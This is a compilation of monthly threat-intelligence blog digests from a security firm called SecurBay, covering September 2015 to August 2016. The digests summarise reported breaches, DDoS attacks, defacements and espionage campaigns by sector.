SecurBay – Threat Intelligence Series

August has been equally challenging with regards to the security related issues.

The number of hacks have been consistently growing emphasising the fact that cyber security must be considered seriously by organisations and alike.

The attacks have been profound thus making it tough for firms and government bodies to deal with them. Here is a glimpse of what happened through the month.

Government and Allied sectors:

F-Secure reveals the details of NanHaiShu, a spy campaign aimed at accessing information from high-profile targets involved in the South China Sea dispute. (1)

Anderson County government officials and the sheriff’s office investigate a possible computer security breach (a “potential system-wide breach” of the main courthouse server) involving 1,800 people. (2)

The Municipality of Ede reveals to have discovered on July 8th that the personal information of about 3,700 Ede residents has been accessed by unauthorized persons due to a security vulnerability on the municipal site. (3)

An anonymous group calling itself Shadow Brokers publishes what it claims are sophisticated software tools belonging to an elite team of hackers tied to the US National Security Agency known as “The Equation Group”. A further analysis confirms the link with the state sponsored crew. (4)

Unknown attackers launch a massive attack aimed at flooding targeted .gov email inboxes with subscription requests to thousands of email lists. (5)

The local council of the Australian city of Brisbane loses A$450,000 (£248,000, US$334,000, EUR 293,000) from email-whaling scammers who trick staff into wiring money into their bank accounts. (6)

Banking, Finance and Allied Sectors:

The price of bitcoin plummets after Hong Kong-based digital currency exchange Bitfinex was hit by hackers who stole $65m (£48m, €57m) of the digital currency. (7)

The central bank of Thailand (BoT) issues a warning to commercial banks in the region about security vulnerabilities in roughly 10,000 NCR ATMs that were exploited by an Eastern European gang of cybercriminals to steal 12 million baht (£260,000, $350,000). (8)

SWIFT discloses new hacking attacks on its member banks as it pressured them to comply with security procedures instituted after February’s high-profile $81 million heist at Bangladesh Bank. In a private letter to clients, SWIFT says that new cyber-theft attempts – some of them successful – have surfaced since June, when it last updated customers on a string of attacks discovered after the attack on the Bangladesh central bank (9)

Accounting firm Presnell Gage notifies about 100 individuals or companies that their information may have been hacked during a data breach in the past month, and fraudulent tax returns filed. (10)

Online and Ecommerce Services:

Peace, the hacker who has previously sold dumps of Myspace and LinkedIn, lists 200 million supposed credentials of Yahoo users on The Real Deal marketplace. Yahoo confirms to be aware of the claim. (11)

Klimpton Hotels and Restaurants advises guests of a possible credit card breach. (12)

123-Reg is taken down by a massive DDoS attack. (13)

Arizona healthcare group Banner Health reveals that hackers may have accessed records of 3.7 million of its customers. The attack was initiated on 17 June. (14)

The New York State Psychiatric Institute notifies 21,880 research participants of a hack happened between April and May. (15)

The PoodleCorp collective claims to have taken down the EA servers shortly after the open beta for upcoming shooter Battlefield 1 went live. (16)

Online password manager OneLogin is breached. In particular the Secure Notes facility was breached, allowing the intruder to read in cleartext notes edited between 2 June and 25 August this year. (17)

About 71,000 user accounts and IP addresses have been leaked from Minecraft fan website Minecraft World Map. The dump includes email addresses, IP address data, usernames, and passwords for popular site Minecraft World Map. (18)

Motherboard reveals that about 50,000 subscriber accounts for media company Infowars are being traded in the digital underground. The company admits the data was dumped from a breach occurred in 2012. (19)

References:

SecurBay Digest 7/16

2016 is growing with the number of databases hacking covering diverse sectors.

The list of the noticeable victims of this month includes: ubuntuforums.org (2 Million accounts leaked), Netia (a Polish ISP that had the entire customer base leaked), Shadi.com (a dating website that suffered the leak of 2M accounts), the media company Penton (5 databases leaked for a total of 1.4 million passwords) and MTN Irancell (this latter is really massive since the leaked data amounts to 20 Million customers). Now let us take a look at the usual sectors.

Government and Allied Sectors:

A hacked called aLem! defaces the websites of Arizona State, Arizona House of Representatives and Arizona State Legislature. (1)

Guccifer 2.0 leaks more documents from the computer networks of the US Democratic Party and exposes plans to spend more than $800,000 (£614,660) on a “counter-convention” in an attempt to hijack the upcoming Republican National Convention (RNC). (2)

The official Twitter account for NASA’s Kepler (@NASAKepler) is hacked and posts an offending image and a dodgy link. (3)

In name of #ZimShutDown2016 or #ShutDownZimbabwe, the Anonymous take down the websites of the country’s official portal (zim.gov.zw), ZANUPF – Zimbabwe African National Union- Patriotic Front (Zanu-PF) and Zimbabwe Broadcasting Corporation (zbc.co.zw). (4)

In retaliation for the Alton Sterling killing, a hacker called @0x2Taylor hacks the Baton Rouge city government’s servers and leaks 50,000 Baton Rouge Police records. (5)

Cymmetria Research releases a new report about a new APT dubbed “Patchwork” tied to Southeast Asia and the South China Sea, targeting governments and entities around the world including the U.S. (6)

Kaspersky Lab researchers reveals the details of a threat actor undertaking aggressive cyber espionage activity in the Asian region, targeting multiple diplomatic and government entities with a particular focus on China and its international affairs. The group is dubbed Dropping Elephant or Chinastrats. (7)

In the same day the permanent court at The Hague rules for Philippines in the dispute against China for the islands in the West Philippine Sea, 69 Philippines Government Websites are taken down by a DDoS attack. (8)

A report published by the House Committee on Science, Space and Technology found that hackers purported to be from China had compromised computers at the Federal Deposit Insurance Corporation repeatedly between 2010 and 2013. Unfortunately the Incident was never reported. (9)

Guccifer 2.0 leaks more documents reportedly stolen from the computer networks of the Democratic National Committee (DNC), including opposition research, political donor lists and internal memos. (10)

Banking, Finance and Allied Sectors:

Hacker group OurMine, claims that it temporarily took down the servers of HSBC in the US and the UK. (11)

The top eight banks in Taiwan have been forced to shut down activity on hundreds of ATMs after a coordinated group of thieves used malware to steal NT$70 million ($2.17m, £1.64m, €1.9m) in cash. (12)

TrapX releases a new report revealing the details of three new attacks related to Medjack, an attack that relies on exploiting existing medical devices that run outdated software in order to enter the secure network of a healthcare unit. (13) TheDarkOverlord puts up for sale a new healthcare database containing the data of about 24,000 patients. (14)

Online and Ecommerce Services:

0x2Taylor claims to have breached the servers of Amazon, and leaks the login credentials of 80,000 Kindle users. The company denies the breach and declares the data was not stolen from its servers and is not legitimate. (15)

Beggars Group, home of independent music labels 4AD, Matador, Rough Trade Records, XL Recordings and Young Turks, warns US customers of a data breach. People who purchased any products from the websites for the aforementioned labels between 28 April 2015 and 4 May 2016 may have been victims of the data breach. (16)

Interpark becomes aware that its systems have been infiltrated and that names, addresses and phone numbers of roughly 10.3 million customers have been stolen two months earlier. The authors of the attack come allegedly from North Korea. (17)

An unknown hacker hacks the official forum for popular mobile game “Clash of Kings,” and makes off with close to 1.6 million accounts. The hack was carried out on July 14 (18)

Reports surface of a possible data breach at the magazine clearing house GunMag Warehouse. (19)

References:

SecurBay Digest 6/16

June marks our half year in terms of tracking key cyberattacks. The number of attacks in June has been high and the trends have been varying penetrating through various sectors – Government, Banking and Online services, as we continue to track. Some of the prominent ones have been listed below.

Government and Allied Sectors:

A hacker under the pseudonym NSA puts on sale on the dark web a database that purports to hold over a quarter of a million driver licence records compromised from a government-linked databases in Louisiana, United States. (1)

Russian government hackers penetrate the computer network of the Democratic National Committee and gain access to the entire database, dumping a 231-page document purporting to be opposition research into Donald Trump. (2)

Palo Alto Networks reveals the details of a cyberespionage group called Sofacy, which has launched a fresh attack against the US government, using a “new persistence mechanism” designed to help evade detection. (3)

The Vermont Department of Fish and Wildlife (FWD) posts a notice for a suspected security breach related to the on-line purchase of licenses and tags from the Department. (4)

Banking, Finance and Allied Sectors:

Hackers affiliated to the Anonymous collective claim to have taken down the London Stock Exchange in name of OpIcarus. (5)

A massive DDoS attack hits BitGo, a service that describes itself as the most secure Bitcoin wallet solution available today. (6)

In name of Project Mayhem, the phase 3 of OpIcarus, the Anonymous take down the official website of the Bilderberg Group, a controversial and highly secretive conference held with the so-called ‘political elite’ alongside experts from academia and finance. (7)

As part of the same operations, the Anonymous take down the Romania Stock Exchange (sibex.ro). (8)

Online and Ecommerce Services:

Scrum.org contacts users to warn them of a security breach. Unknown attackers took control of their web server to hijack initial password configuration emails. (9)

Users of the remote login service TeamViewer report their computers have been ransacked by attackers who somehow gained access to their accounts. (10)

51 Million user accounts for iMesh, a now defunct file sharing service, are put on sale on the dark web. (11)

Reference:

SecurBay Digest 5/16

As we hit the summer in May, we continue to focus on Government, Banking and Online services as our major sectors.

The cyberattacks during May have been predominantly in almost every sector. However, the biggest concern has been the SWIFT attacks including 12 other banks. Read on.

Government and Allied Sectors:

The identities of members of an elite Swiss special forces army unit have been revealed in a hack of the RUAG defence contractor. (1) San Juan County reports that the information of patients in the county’s DWI treatment program may have been compromised after an attacker gained remote access to one of its computers (2) The Statistical Centre of Iran is targeted by unknown attackers. Iran tracks the origin of the attack from three Arab countries including Saudi Arabia. (3) Complete Chiropractic & Bodywork Therapies notifies 4,082 patients after discovering that malware had been injected into their system in November, 2015. (4)

Banking, Finance and Allied Sectors:

Unknown individuals access Equifax’s W2Express website and steal tax and salary data. (5) OpIcarus continues and this time the hacktivists of the Anonymous collective take down the Central Bank of Cyprus (centralbank.gov.cy) (6) A 10GB file has been published online that purports to hold sensitive financial data on tens of thousands of customers belonging to UAE Investbank. A Turkish group dubbed Bozkurtlar claims responsibility for the attack. (7) OpIcarus continues and the Anonymous take down other banks across the world, including: The Central Bank of the Dominican Republic, the Guernsey Financial Services Commission, the Central Bank of Maldives, the Dutch Central Bank, the National Bank of Panama, the Central Bank of Kenya, the Central Bank of Mexico and the Central Bank of Bosnia and Herzegovina. Special Mention of the month: In name of OpIcarus, Anonymous affiliated hackers have continued their DDoS campaign on international financial institutions. The hacktivist collective attacked 18 banks between 13 and 19 May. Apart from the New York stock exchange, Bank of Scotland, Bank of France, five US Federal Reserve branches, among others were targeted by the collective. (8) The investigation into the attempted $1 billion electronic heist at the Central Bank of Bangladesh expands to as many as 12 more banks that all use the SWIFT payment network. (9)

Online and Ecommerce Services:

Malwarebytes reveals the details of a malvertising campaign targeting visitors to two TV stations (KMOV and WBTV) affiliated with the American CBS TV network. (10) Babycare retailer Kiddicare has warned customers that personal data consisting of 795,000 records shared with the store has been stolen by hackers. (11) SonnySpooks hacks paypalsucks.com and dumps 82,169 records with usernames and hashed passwords. Fiverr suffers Six-Hour DDoS Attack After Removing DDoS-for-Hire Listings. (12) A black hat hacker dubbed @TehBVM takes over random subreddits, removing moderators, and changing the subreddit’s CSS style, leaving a defacement message behind. (13) A hacker who goes by the nickname of Amar^SHG (formerly Kuroi’SH) defaces France’s most visited weather portal, Météo France. (14)

SecurBay Digest 4/16

Government and Allied Sectors:

A group of Turkish hackers going by the online handle of Turk Hack Team (THT) defaces some Armenian Government servers to claim their hold on the Nagorno-Karabakh region. (1) Turkish authorities investigate the alleged leak of nearly 50 million citizens’ sensitive, personal data (almost two-thirds of the country’s 75 million-strong population). According to reports, a database that was uploaded online appeared to have been stolen in 2009 from a state agency which issues national ID cards. (2)

FBI unusually warns that “a group of malicious cyber actors,” whom security experts believe to be the government-sponsored hacking group known as APT6, has compromised and stolen sensitive information from various government and commercial networks since at least 2011. (3) Despite the official reason is a solar storm, Sweden secretly suspects that a hacker group linked to Russian intelligence was responsible for an attack on its air traffic control systems last November. (4)

The Cyber Justice Team has taken responsibility for a big hack of Syrian government networks, which resulted in a massive 43GB data leak online. (5) Up to 831 members of Britain’s defence community with high-level security clearances had their personally identifying information stolen when the Ministry of Defence’s business networking organisation was hacked earlier in November 2015 via the compromising of Niteworks, a MoD contractor. (13)

Members of the New World Hackers (NWH), one of Anonymous’ divisions, launch a DDoS attack against the city of Denver’s website (denvergov.org) (14)

Banking, Finance and Allied Sectors:

A phishing attack compromises the identities of more than 2,100 employees of Olympia School District. (6) Anonymous takes down the Dalhousie University website against 2015 rape, demanding punishment for the culprits. (7) British government-funded educational network Janet is hit by a DDoS. (8) Solano Community College is hit with a spear phishing attack leading to the W-2 information for about 1,200 staffers being compromised. (16) CoinWallet is forced to shut down their operations by May 1, 2016, after a data breach.(17). 14 school systems, 3 in Alabama and 11 in Mississippi are impacted by a breach to Innovak International involving employees. (18) Documents purporting to be from the Qatar National Bank are leaked on a file-sharing site Cryptome.org. According to Cryptome, the leaked file contains more than 15,000 documents detailing more than 100,000 accounts with passwords and PINs. (19)

Online services and Ecommerce services:

Apparently the staggering leak of 2.6 TB from law firm Mossack Fonseca known as Panama Papers seems to be due to a hack exploiting a WordPress Vulnerability. (9) Coinroll Bitcoin Casino admits that several users had the funds on their online accounts stolen. The breach could be related to an open MongoDB. (10) dōTERRA notifies several customers and distributors of a possible data breach involving a third-party providing them with hosting and software services. (11)

Identity thieves steal tax and salary data from payroll giant ADP by registering accounts in the names of employees at more than a dozen customer firms. ADP says the incidents occurred because the victim companies all mistakenly published sensitive ADP account information online that made those firms easy targets for tax fraudsters. (12) LuckyPet notifies the California State Attorney General’s office of a data breach that compromised online customer information. (15).

References:

SecurBay Digest 3/16

According to Hackmegaddon , this month has seen a remarkable number of W-2 data breaches aimed to use the stolen identities to file fraudulent tax returns. Victims include: – Ameripride – Actifio – Endologix – DataXu – Billy Casper Golf – Care.com – Matric NAC and Matrix Service Company Applied Systems – SevOne – SalientCRGT – Mitchell International – WorkCare – Foss – PerkinElmer – Advance Auto Parts – Sequoia Union High School District.

Government and Allied Sectors:

A new report from Trend Micro reveals that the Russian Group behind the Operation Pawn Storm is targeting several offices in Turkey. (1) Finland foreign minister Erkki Tuomioja reveals to the media that foreign ministry computer network has been infiltrated by spies. The breach has apparently been going on for four years. Suspects are directed to Russia or China. (2). Chinese security researchers from cyber-security vendor Qihoo 360 reveals the details of a malicious actor named OnionDog that’s been targeting Korean-speaking countries since October 2013. (3).

Hackers from New World Hackers group (NWH) claim to have taken down the official website of Salt Lake City police, the airport, First Utah Bank and Downtown Alliance in a form of protest against the shooting of the teenager Abdi Mohamed. (4). AnonymousCorrupt, a group of hacktivists linked to the Anonymous claim to have taken down the nasa.gov website. (5).

The database of the Philippine Commission on Elections (COMELEC) is breached and the personal information of 55 million voters potentially exposed in two consecutive attacks.(6) In name of #OpLusofonia, the Portuguese branch of the Anonymous defaces 28 Angolan Government Websites in retaliation for the recent sentencing of 17 activists.(7)

Banking, Finance and Allied Sectors:

Members of the @TheFamilyMethod claim to have hacked the Bank of North Dakota and dump the records of 124 transactions. (8) Moneytree is the latest company to alert current and former employees that their tax data, including Social Security numbers, salary and address information, was accidentally handed over directly to scam artists.(9).

Reuters reports that unknown hackers were able to breach the Bangladesh Bank’s systems and steal its credentials for payment transfers, using them to transfer money to entities in the Philippines and Sri Lanka. The hackers were able to get away with a bounty of about $80 million, but a spelling mistake helped prevent a further nearly $1 billion theft. (10)

American Express warns some customers that their personal details may have been exposed due to a data breach of a third-party service provider. (11) BitQuick announces to shut down its server following an attack that gave the attacker unauthorized administrative access. However, all funds, IDs and emails remain secured. (12) . After a sustained wave of DDoS attacks, the Bitcoin startup Coinkite Inc. officially announces the shutdown of its secure wallet service. (13)

Online and Ecommerce Services:

Malwarebytes reveals the details of a malvertising campaign, distributing the infamous Angler Exploit Kit, and targeting likes.com and livejournal.com, two famous social network sites visited by respectively 110M and 140M visitors per month. (14) Clothes website SportPursuit is hit by hackers over the Easter weekend, potentially losing customers’ bank card details.(15)

Administrators of the vBulletin forums start a site-wide password reset operation after an unknown attacker gained access to one of their servers. (16) SonnySpooks hacks buzzmachines.com and dumps nearly 37.000 usernames and passwords. Metropolis hacks allosambre.com and dumps 1,535 usernames and clear text passwords. (18) A flurry of ransomware attacks against hospitals in recent weeks suggests that online criminals may have found a new favourite target for cyber-extortion (19).

References:

Source: http://hackmegaddon.com

SecurBay Digest 2/16

In our February 2016 TI Blog, we cover three streams – Government, Banking and E-Commerce and allied sectors.

Government and Allied Sectors:

In name of #OpAfrica and #OpMonsanto hackers from World Hacker Team hack the South Africa’s Department of Water Affairs (DWA) and leak the data of 5,800 government employees. (1)

In name of #OpAfrica, the Anonymous dump names, phone numbers, email addresses and hashed passwords of more than 1,000 government employees. (2)

A group of Chilean hacktivists that go by the name of Chilean Hackers break into the database of CONADI and steal the personal details of 304,189 Chilean citizens looking for state benefits from the country’s government. (3). The US Internal Revenue Service is the target of an attack able to steal the electronic tax-return credentials for 101,000 social security numbers. The attack is performed using credentials stolen from an external source. (4)

And #OpAfrica continues with the dump of the details of 220 government employees from Uganda’s Ministry of Finance. (5). As a form of protest against French Arms Trade the Anonymous hack into one of the Web portals managed by France’s Ministry of Defense (outils.cimd.interarmees.defense.gouv.fr).(6)

In name of #OpGreenRights, the Italian branch of the Anonymous collective takes down the websites on local authorities of Apulia and Basilicata for participating in the Trans Adriatic Pipeline (TAP) project. (7) Members of Anon Verdict, a sub-division of the Anonymous hacker collective, leak the details for 52 officers and employees of the Cincinnati Police Department. The Police Department questions the validity of the hack. (8)

Banking and Allied Sectors:

The website of Coast Central Credit Union, a financial institution that serves more than 60,000 customers, is hacked, allowing attackers to implant a backdoor. (9) Kaspersky Lab reveal the details of ATMZombie, a sophisticated trojan targeting Israeli customers, characterized by the ability to exploit a loophole in one of the bank’s online features; and later by physically withdrawing money from the ATM. (10)

The Cyber Crime Department of the Russian Interior Ministry reveals the details of an operation able to steal about 1.5 bln rubles ($19.8 mln) from several dozen Russian banks, during 2015 via compromised Visa and MasterCard international payment systems. (11). Bloomberg reveals that hackers used malware to penetrate the defenses of Energobank, a Russian regional bank and move the ruble-dollar rate more than 15 percent in minutes, according to Group-IB, the Moscow-based cyber-security firm hired to investigate the attack. The “Metel” or “Corkow” malware was used to carry on the attack. (12).

A research reveals that hackers have siphoned about $103,000 out of Bitcoin accounts that were protected with an alternative security measure called “brain wallets” in which funds are stored in users’ minds through memorization of a password rather than a 64-character private key.
(13).

Ecommerce and Online Services:

Incipio, LLC notifies an unspecified number of customers that malware compromised orders placed online. (14). Bravewanderer hacks techfactory.net and dumps 15,601 usernames and clear text passwords. (15).

@0x1Taylor hacks teksyndicate.com and dumps more than 30,000 records with usernames and hashed passwords. (16) Team Fursec hack differencegames.com and dump 16,589 usernames and hashed passwords. (17). A hacker on the dark web forum Hell claims to have sold the email addresses and plaintext passwords of over 27 million users of dating site Mate1.com. (18)

SecurBay Digest 1/16

New year Greetings from SecurBay Threat Intelligence team. This year we continue to cover the top 3 sectors.

Government and Defense
Banking and Financial Services
Ecommerce and Online Sectors

Below are the key attacks that happened in January 2016.

Government and Defense:

The Anonymous start their campaign against the Thai government and claims responsibility for shutting down 14 Thailand police websites to protest the death sentences of two Myanmar migrant workers (Zaw Lin and Win Zaw Htun) convicted of murdering two British tourists (Hannah Witheridge and David Miller).(1) Sc0rp!n Att@ck3r from Muslim Cyber Army hacks the Goa University (unigoa.ac.in) and dumps 10,380 records with hashed passwords.(2) In name of #OpNigeria and #OpCorruption, the Nigerian branch of the Anonymous takes down several government websites.(3) Hokkaido University reveals that the personal data of more than 110,000 students and graduates may have been leaked due to unauthorized access of its computer systems by unknown parties.(4)

The Operation #BoycottThailand, aimed to expose the wrongdoing of Thai Police over the death sentences handed down to two Myanmar migrant workers, continues. Blink Hacker Group, a collective affiliated to the Anonymous leaks 1Gb of data belonging to Thailand’s Supreme Court.(5) Ukrainian authorities announce to review the defences of government computer systems, after detecting a cyber attack on Kiev’s main airport launched from a server in Russia.(6) The State of Michigan confirms to have suffered a cyber attack similar to the one targeting Hurley Medical Center.(7)

A number of Irish government-related and public sector websites are knocked offline by an apparent DDoS attack.(8) UK-based researcher and activist Thomas White releases 2.5 GB of data stolen in a recent hack of the computer systems of the Fraternal Order of Police (FOP), the biggest police union in the United States. The activist is not the author of the attack and admits to have received the data from an unknown source (9) cyber-attack. UK-based researcher and activist Thomas White releases 2.5 GB of data stolen in a recent hack of the computer systems of the Fraternal Order of Police (FOP), the biggest police union in the United States. The activist is not the author of the attack and admits to have received the data from an unknown source. (10)

Banking and Financial Services:

Belgian bank Crelan is the last victim of fraudsters, with a damage of over EUR 70 million (around $75,8 million).(11) A group of Turkish hackers dubbed WKPF defaces the official website of Russia’s Joint-Stock Commercial Bank for Reconstruction and Development Ekonombank.(12)

The University of Virginia admits to have been targeted by a data breach which has placed the private data of employees at risk. Cyberattackers were able to access a component of the HR system, leading to the exposure of information belonging to approximately 1,400 Academic Division employees.(13) Hackers break into the servers of Bank Yerushalayim and access data on thousands of customers.(14) HSBC is hit by an apparent DDoS attack on its online banking system.(15)

Ecommerce and Online Services:

An unknown attacker hacks pagesjaunesdusenegal.com and dumps 9500 usernames and hashed passwords. ( 16) A crew called Fr0mShell hacks over2craft.fr and dumps 5,868 accounts with clear text passwords. ( 17)

Paul Vernon, founder of Cryptsy announces that the cryptocurrencies exchange has been hacked. The announcement is made more than a year after the discovery of the hack because Cryptsy, in the meantime, was trying to cover the losses, which amount to USD 6M.(18)

References:

SecurBay Digest 12/15

As 2015 winds up, we present the December Threat Intelligence Series. As is our practice, we present the report across Government, Banking and Online Sectors (and allied sectors).

Government, Defense and Allied Sectors:

China is blamed for a major cyber-attack on the computers at the Australian Bureau of Meteorology (bom.gov.au), which has compromised sensitive systems across the Federal Government. (1) NetherlandsMoDz hacks apgschool.com and dumps 1.087 records with usernames and hashed passwords. (2) A hacker called g0tchack hacks the website of the City of Providence and asks for a ransom of 1BTC (358USD worth) to give the data back. (3) Security researchers from FireEye unveil the details of APT16, a new APT group linked to mainland China, targeting Taiwanese politicians and members of the media, just weeks before the country’s elections. (4)

The US Department of Homeland Security (DHS) and the US Customs and Border Protection (CBP) agency report on incidents where drug traffickers have hacked unmanned air vehicles (UAVs, drones) in order to illegally and secretly cross the US-Mexican border. (5) Armenian hackers from The Monte Melkonian Cyber Army hack the official websites of Azerbaijani Ministry of Labour and Social protection and the Ministry of Emergency Situations, and leak a trove of sensitive documents belonging to local citizens. (6) Palo Alto Networks unveils the details on a cyber-espionage campaign currently targeting Russian or Russian-speaking organizations. The campaign seems the continuation of an operation first uncovered by ESET, called Roaming Tiger. Suspects are directed to China. (7)

The Ukrainian government blames power outages in the Western Ukraine on “hacker attacks by Russian special services”. According to the Security Service of Ukraine (SBU), malware has been found in the networks of some utilities. Moreover, these malware intrusions coincided with a “non-stop telephone flood at utility plants’ technical support departments”, according to local reports. (8) Egyptian hackers associated with the Anonymous Rabaa Team deface the website of the Ministry of the Environment in Costa Rica, and more specifically, two pages with details about the System of Conservation Areas and the Isla del Coco (Cocos Island), the inspiration for Isla Nublar from the Jurassic Park movies. (9)

The official Web portal of the University of Connecticut is compromised and used to spread malware to all visitors, masqueraded as a fake Adobe Flash Player update. (10). Researcher Chris Vickery uncovers a database sitting on the Web containing various pieces of personal information related to 191 million American citizens registered to vote (300 Gb). The data appears to date back to 2000. The researchers point the finger to NationBuilder, a service that sets up digital campaigns for political parties. (11)

Banking, Financial Services and Allied Sectors:

A Crew called Comcastkids hacks agpestores.com and dumps 120,000 usernames and passwords. (12) Quincy Credit Union temporarily suspends its customers’ ATM cards after multiple people reported fraudulent charges. The banks confirm it is investigating a possible hack. (13) The Association of Banks in Singapore (ABS) warns mobile users of a new malware targeting banking services and hijacking sensitive data such as credit card details and one-time passwords (OTPs). The malware affects both Android and iOS devices. (14)

Ecommerce, Online Services and Allied Sectors:

@Smitt3nz AKA Rubber hacks igcd.net and dumps 1,452 usernames and hashed passwords (15). ap3x h4x0r from the Anonsec collective hacks saifa.ir and dumps 11,792 records.(16) GrenXPaRTa hacks befriending.co.uk and dumps 7325 usernames and hashed passwords.(17) In a letter to customers, UK web hosting firm Easily.co.uk reveals to have suffered a targeted attack which exposed an unspecified number of customer domain names. (18)

ProjectDump hacks bluebooktrader.com and dumps 6,187 usernames and hashed passwords. (19) Phantom Squad prepare their Christmas campaign and claim responsibility for a DDoS attack on Microsoft’s Xbox Live service. (20) An unknown hacker hacks tunesoman.com and dumps 7,343 usernames and passwords.(21)

Wishing you all ‘secure’ and ‘hack-free’ 2016!

References:

SecurBay Digest 11/15

We continue our coverage of Cyber Attacks across the word. We continue our sectorwise coverage into three broad categories – Government, Defense and Education, Banking and Allied Sectors, Ecommerce and Online services. The nature of attacks continues to show the vulnerability of cyber-presence across the echelons of power.

Defense, Government and Allied sectors:

Several Internet services in Boston are disrupted by a DDoS attack, defines as a “minor act of cyber vandalism”. The outage, affects city agencies and the police and fire departments. (4) The website of Japan’s Health, Labor and Welfare Ministry is taken down by a DDoS attack. The Anonymous collective claims responsibility. (5)

Banking and Financial Services:

Reuters reveals that hackers belonging to the Armada Collective have staged cyber-attacks on three Greek banks and demanded a ransom in bitcoins, to stop their disruption. (6) Group-IB reveals that over the last 5 years’ criminals in Russia found a way to steal 252 million Rubles ($3.8 million) from five unnamed banks, using a novel technique called a “reverse ATM attack”. (7) A hacker called Hacker Buba hacks into Invest Bank and holds it to ransom, demanding $3M, and leaking confidential data of clients on Twitter every few hours. (8) Another episode of the cyber war between Armenians and Azerbaijani hackers: Armenian hackers calling themselves the Armenian A.S.A.L.A. group hack the Mortgage Fund sub-domain (amf.cbar.az) of the Azerbaijan Central Bank and leak some customer data. (9)

E-Commerce and Online Services:

On November 30, 2015 and December 1, 2015, over two separate intervals, several of the Internet Domain Name System’s root name servers are the target of a massive DDoS attack. (10) @Smitt3nz AKA Rubber hacks igcd.net and dumps 1,452 usernames and hashed passwords.(11) ap3x h4x0r from the Anonsec collective hacks saifa.ir and dumps 11,792 records.(12) Researchers from Comodo identify a new phishing attack targeted specifically at businesses and consumers who may use Alibaba.com.(13) ProjectDump hacks bluebooktrader.com and dumps 6,187 usernames and hashed passwords. (14)

References:

SecurBay Digest 10/15

In our Threat Intelligence Report for October 2015, we provide cyber attacks classified into threat categories – Government and Defence, Banking and Financial Services, and Ecommerce and online services.

Government and Defence:

The Kennebec County phone system is hacked topping 2,100 calls in a weekend. (1) Two Brazilian hackers deface two government-owned domains. The target is the Brazilian Institute of research and development in Astronomy, Geophysics and Meteorology of Time and Frequency, which has two of its domains defaced (intranet.on.br and euler.on.br). (2) Ha Tae-Kyung, a Seoul lawmaker, cites intelligence reports stating that North Korea is suspected of having launched a cyber-attack last year on the South Korean capital’s subway system that carries millions of commuters every day. (3) Researchers from Check Point disclose the details of a campaign targeting the Israeli public sector, using the MWI (Microsoft Word Intruder) exploit kit to deliver a modified version of the Zeus malware. (4)

The Belgian branch of the Anonymous collective takes down the official websites of Belgian Prime Minister Charles Michel, the Brussels parliament and the website of Federal Public Services Home Affairs.(5) A hacker going with the online handle of Kuroi SH defaces several domains of the United States based Uniformed Services University and leaks 2014 login credentials online.(6) A hacker dubbed Implosion hacks the Rutgers University Pharmaceutical Industry Program and dumps 1057 usernames and hashed passwords. (7). South Korea’s intelligence agency reports that North Korean hackers accessed servers belonging to the Blue House, the executive office of South Korea, and stole data from computers belonging to members the nation’s legislature. (8) Trend Micro reveals that the same hackers behind Operation Pawn Storm targeted the international investigation team of the MH17 plane crash from different sides (9). KelvinSecTeam hacks a subdomain of the Venezuelan Education Ministry and dumps 2,788 usernames and clear text passwords. (10)

Banking and Financial Services:

Online stock brokerage Scottrade has suffered a breach that exposed the personal information of 4.6 million customers. Scottrade officials said in an online advisory that the breach happened in late 2013 or early 2014 and exposed social security numbers, e-mail addresses and “other sensitive information”. (11) A Russian man that calls himself “Alister Maclin” has been disrupting the Bitcoin network for over a week, creating duplicate transactions, and annoying users.(12)

The New York Times reveals that months before its technology became the centrepiece of Samsung’s new mobile payment system, LoopPay, a small Massachusetts subsidiary of the South Korean electronics giant, was the target of a sophisticated attack by a group of government-affiliated Chinese hackers.(13) E-Trade notifies about 31,000 customers this week that some of their personal information may have been accessed during a cyberattack in late 2013.(14) Optimal Payments Plc declares to be investigating allegations that personal data belonging to some of its customers could have been compromised and being available in the dark web. According to the allegations the breaches had occurred at two of its units back in 2012 or earlier. (15)

Ecommerce and Online Services:

Hackers break into a server and make off with names, driver license numbers, and other personal information belonging to more than 15 million US consumers who applied for cellular service from T-Mobile. The breach is the result of an attack on a database maintained by credit-reporting service Experian, which was contracted to process credit applications for T-Mobile customers and affects people who applied for T-Mobile service from September 1, 2013 through September 16 of this year. (16) An anonymous hacker hacks three Thailand e-commerce sites in a single shot and dumps approximately 5900 usernames and hashed passwords for each one of them (17).

An unknown hacker hacks aussiefarmers.com.au and dumps more than 5,500 personal records. (18) A hacker calling himself NetherlandsMoDz claims to have hacked asialawhouse.com and dumps nearly 7,000 usernames and clear text passwords. (19) A hacker dubbed mr.nsaany AKA @mr.nsaany hacks forums.phpfreaks.com and leaks the entire database (allegedly 173.000 users).(20) NetPirates hack bharatlaws.com and dump >10,000 usernames and clear text passwords.(21) A crew of hackers called Comcastkids hacks shopatsullivan.com and dumps more than 10,000 accounts.(22)

References:

SecurBay Digest 9/15

September TI Report:

September saw increased activity in the first half and a downward trend in the second half. SecurBay’s Threat Intelligence Report provides a compilation of the cyberattacks worldwide, sectorwise.

Government, Defense and Education:

Kelvinsecurity AKA KelvinSecTeam hacks the website of the Mexican Public Education Registry (Secretaría de Educación Pública sepdf.gob.mx) and dumps 106 records with hashed passwords.( 1) A group of hackers going with the online handles of RootDevilz, Jonturk75 and Bozkurt97 deface the official website of Unicef India (unicef.in) and post a message against China, US, UN and EU.(2) M511 dumps some data from the University of California at Los Angeles (UCLA) after allegedly warning the university twice. The attacker also warns other universities of possible vulnerabilities including: Western Governor’s University in Utah, the University of Minnesota, DePaul University, and Northern Illinois University.(3) In name of OpTaiwan, the online hacktivist Anonymous shuts down several Taiwan government websites.(4)

The Lizard Squad takes down the official website of UK’s National Crime Agency (nationalcrimeagency.gov.uk).(5) Hackers claiming to be part of Islamic State deface the Wayne County Board of Education website (boe.wayn.k12.wv.us) (6) The website of Greater Manchester Police in the UK (gmp.police.uk) is hit by two DDoS attacks. A Twitter account going by the handle @n0w1337 claims responsibility for the attack.(7)

Hackers infiltrated the Pentagon food court’s computer system, compromising the bank data of an unknown number of employees.(8) FireEye researchers discovers a campaign led by attackers from North Korea, exploiting a zero day vulnerability (CVE-2015-6585) in Hangul, a word processor popular with the South Korea’s government. The backdoor is called Hangman.(9)

Banking and Finance:

Hawaii First Federal Credit Union notifies an undisclosed number of customers that an unauthorized individual may have gained access to an employee’s email account, and could have accessed personal information.(10) CSIS team reports a new variant of the Carbanak trojan using a new communications protocol.(11).

YapStone (VacationRentPayments) notifies some property managers and others who use their service to receive vacation rental payments that personal information in their account applications was compromised by unauthorized persons between July 15, 2014 and August 5, 2015.(12)

